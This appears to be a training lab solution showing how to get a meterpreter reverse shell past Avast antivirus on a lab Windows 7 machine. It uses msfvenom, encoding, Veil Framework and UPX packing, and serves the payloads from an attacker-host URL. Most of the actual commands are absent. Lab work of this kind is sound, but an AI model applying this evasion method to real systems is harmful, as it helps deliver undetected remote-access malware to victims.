Bypassing AV
overview
In this lab, you will learn to bypass one of the popular antiviruses, namely Avast.
Lab Environment
In this lab environment, the user will get access to a Kali GUI instance. A Windows 7 machine can be accessed using the tools installed on Kali at IP address 172.16.5.10.
Objective: Bypass the latest version of Avast AV.
Instructions
Use the following credentials to connect to the Windows machine over RDP:
Username: aline Password: soccer
Tools
The best tools for this lab are:
Veil Framework
UPX
rdesktop
A web browser
Please go ahead ONLY if you have COMPLETED the lab or you are stuck! Checking the solutions before actually trying the concepts and techniques you studied in the course will dramatically reduce the benefits of a hands-on lab!
Solution
Step 1: Open the lab link to access the Kali GUI instance.
Step 2: Check if the provided target machine is reachable.
Command:
The target machine is reachable.
Step 3: Check for open ports on the target machine.
Command:
Notice that port 3389 (RDP) is open on the target machine.
Step 4: Connect to the Windows machine over RDP.
Use the following command to connect to the provided Windows machine over RDP:
Command:
Once the connection is established, you should get access to the Windows 7 machine:
Step 5: Check if Avast AV is running.
On the provided Windows 7 machine, Avast AV is running:
Step 6: Generate reverse TCP payload.
Now let's generate a reverse TCP payload which we will then send to the Windows machine.
Check the IP address of the attacker machine:
Command:
The IP address of the attacker machine is 172.16.5.101.
Generate reverse TCP payload using msfvenom:
Command:
The payload file has been generated!
Notice that it is a 32-bit PE executable (a Windows executable).
Step 7: Start an HTTP server on the attacker machine.
We will run a Python-based HTTP server on the attacker machine:
Command:
Now we can serve the payload executables to the Windows machine.
Step 8: Start a reverse TCP handler on the attacker machine.
Open another terminal and start a reverse TCP handler using the following commands:
Commands:
Step 9: Download the payload on the Windows machine.
Head over to the Windows machine and open the following URL:
URL: http://172.16.5.101/rTCP.exe
The download would fail:
The Avast AV had detected and blocked the malicious file:
Step 10: Temporarily disable the Avast AV.
Let's disable the Avast AV for a moment and try out the payload.
Click on the hidden icons button at the bottom:
Notice that Avast is currently running:
Disabling Avast AV:
Double click on the icon for Avast (orange icon):
That would open the Avast AV application window.
In this application window, click on the Menu option on the top:
Select Settings:
Select Protection > Core Shields:
There you should notice the Core Shields toggle button:
Click on it to disable the Avast AV protection.
Select Until I turn it on again option:
Click on the OK, STOP button:
And after all these steps, the Avast AV would be temporarily disabled.
Step 11: Download and execute the malicious executable.
Now with the Avast AV disabled, let's see if the malicious executable would be downloaded or not.
Open the following URL:
URL: http://172.16.5.101/rTCP.exe
This time the file is successfully downloaded:
Now that it's successfully downloaded, we can run it:
After running the executable, head over to the terminal where the reverse TCP handler was running (on the attacker machine):
Notice that we got back a meterpreter shell on the target machine.
Now we can run commands on the target windows machine:
Command:
Let's launch a calculator, just for demonstration purposes:
Command:
Check the Windows desktop:
A calculator instance was indeed launched!
Before proceeding to the next step, exit the meterpreter shell session and restart the reverse TCP handler:
Command:
Step 12: Enable and bypass Avast AV.
Enable Avast AV by toggling the Core Shields button:
We know that the Avast AV detected the rTCP.exe payload, so let's generate an encoded payload using the following command:
Command:
Check the file type:
Command:
It's a 32-bit PE executable (a Windows executable).
Download the encoded payload file (on Windows machine):
URL: http://172.16.5.101/rTCPenc.exe
Avast AV also blocked this file:
So the downloading failed!
Let's use UPX packer on the encoded executable:
Command:
Download the encoded and packed payload file (on Windows machine):
URL: http://172.16.5.101/rTCPenc2.exe
Avast AV detected this encoded and packed payload as well:
So the file download failed again!
So the msfvenom payload wasn't successful in bypassing Avast AV's detection, and neither were the encoded or packed payloads!
Let's use the Veil Framework and generate a reverse TCP payload:
Command:
We will be using the Evasion payload:
Command:
List the available payloads:
Command:
Locate the python/meterpreter/rev_tcp.py payload:
It's located at number 28. Select that payload:
Command:
For this payload, we will specify the LHOST and LPORT values and generate the payload:
Commands:
Specify the resulting payload file name as rTCPveil.
We will be using PyInstaller to create the payload executable:
In a few seconds, the payload would be generated:
Press enter and enter exit command to exit the Veil Framework:
Copy the payload file to /root (the directory where the Python-based HTTP server is running):
Commands:
Notice that the Veil Framework generated a 32-bit PE executable (a Windows executable).
Download the payload executable on the Windows machine via the following URL:
URL: http://172.16.5.101/rTCPveil.exe
Avast AV detected the infected executable and quarantined it:
So the file download failed again!
Pack the file using UPX:
Command:
Notice that the resulting executable rTCPveil2.exe is a UPX compressed PE32 executable!
Download the rTCPveil2.exe executable on the Windows machine:
URL: http://172.16.5.101/rTCPveil2.exe
The UPX compressed file is successfully downloaded:
Execute the payload file:
That should get back a meterpreter shell session!
Now we can run commands on the target windows machine:
Command:
Check if Avast is still running:
Command:
Avast AV is running on the machine.
Launch calc.exe on Windows machine:
Command:
Head back to the Windows machine:
Notice that a calculator instance is running on the Windows machine!
Also, if you check Avast AV, its Core Shield is still enabled:
So that was all about bypassing the lastest Avast AV on a Windows 7 machine!
In this lab, we experienced many failed attempts and a final successful attempt in bypassing Avast AV. This should give you an idea on bypassing other AVs as well. The process is simple - try and mutate the payload using various techniques - encoding, compressing, etc. Since not all AVs are designed the same way, and thus a lot more effort might be required if you are planning to bypass multiple AVs. But this lab should give you a taste of what it takes to bypass an AV.
References
Last updated